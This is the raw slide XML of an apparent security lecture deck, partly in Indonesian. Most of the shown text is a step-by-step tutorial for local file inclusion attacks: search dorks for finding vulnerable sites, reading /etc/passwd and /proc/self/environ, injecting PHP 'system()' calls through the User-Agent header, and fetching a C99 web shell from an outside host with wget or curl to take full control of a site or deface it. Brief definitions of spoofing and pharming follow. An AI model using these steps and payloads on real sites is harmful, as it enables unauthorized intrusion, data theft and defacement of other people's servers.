            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SNIFFING </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42505450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Local FILE INCLUSION</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20066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Query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>allinurl:index.php?page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=   or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>allinurl:site.php?site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example, we found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.site.com/index.php?page=contacts.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Try to change</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.site.com/index.php?page=null</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4161186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If you see a list of errors running down the page, or missing content (pictures, text etc.), then the site is vulnerable and we may continue, otherwise just move on to the next site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now, we're going to try and connect to a file which we know exists on Linux servers, /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Since </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has the rights to connect to a file like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>contacts.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, it's possible that the administrator has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>forgottten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to restrict its access to other files, including the files containing sensitive data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We're going to try to read the file "/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" which contains data on root users, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://www.site.com/index.php?page=/etc/passwd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29149686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you see a large list of data appear, then that's great, the site is completely vulnerable to LFI, and you've pretty much got this in the bag.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you don't see this data, but get a 403 error or more errors, then move on to another site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now, change your URL again to: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://www.site.com/index.php?page=/proc/self/environ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="627971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sz="4900" dirty="0"/>
              <a:t>f you now see a new set of data, that's great</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4900" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4900" dirty="0"/>
              <a:t>If somewhere in the data the following is shown, then that's even better.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4900" dirty="0" smtClean="0"/>
              <a:t>DOCUMENT_ROOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4900" dirty="0"/>
              <a:t>=((Random value here))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4900" dirty="0"/>
              <a:t>If not, unfortunately you'll have to move on, there are ways to circumvent this, but I'm keeping this tutorial as basic as I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4900" dirty="0" err="1" smtClean="0"/>
              <a:t>can.Now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4900" dirty="0"/>
              <a:t>, open up Tamper Data, and change your User Agent value to the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4900" dirty="0" smtClean="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4900" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4900" dirty="0"/>
              <a:t>&lt;?system('id');?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2012189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1024128" y="2366383"/>
            <a:ext cx="9529212"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rPr>
              <a:t>This is a basic PHP code to check if we can execute code on our vulnerable machine.</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The page should refresh, and your DOCUMENT_ROOT value should have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rPr>
              <a:t>changed, if it didn't, go for another website.</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Now change your User Agent again, this time to</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:b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rPr>
              <a:t>Code:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Unicode MS" panose="020B060402020202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Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&lt;?system('</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> -a');?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a: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rPr>
              <a:t>If your User Agent changes again, great.</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Now we're going to upload a shell, which will grant us full control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rPr>
              <a:t>of the site, and the ability to deface / root / whatever you feel like doing.</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Change your user agent to the following:</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lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;?system('wget http://www.sh3ll.org/c99.txt -O secret.php');?&gt;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56641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What the above command does is saves a text form of a powerful PHP shell, 'C99' and then renames it to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>secret.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note: If the above </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command does not work, you should try curling it instead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>system('curl -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> http://www.sh3ll.org/c99.txt');?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>navigate to your shell, which should be at the following directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>www.site.com/secret.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NOTE: If your website's vulnerable page was something </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>like</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code:   http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>www.site.com/dir/dir/dir/index.php?page=contacts.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then your shell will be at the directory of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, so for the above case, you will find it at:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://www.site.com/dir/dir/dir/secret.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3747422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Spoofing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>memperoleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>suatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>berhubungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>berpura-pura</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>memalsukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> host yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dipercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>oleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>seorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> cracker”. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Pharming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> di internet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>suatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mengarahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
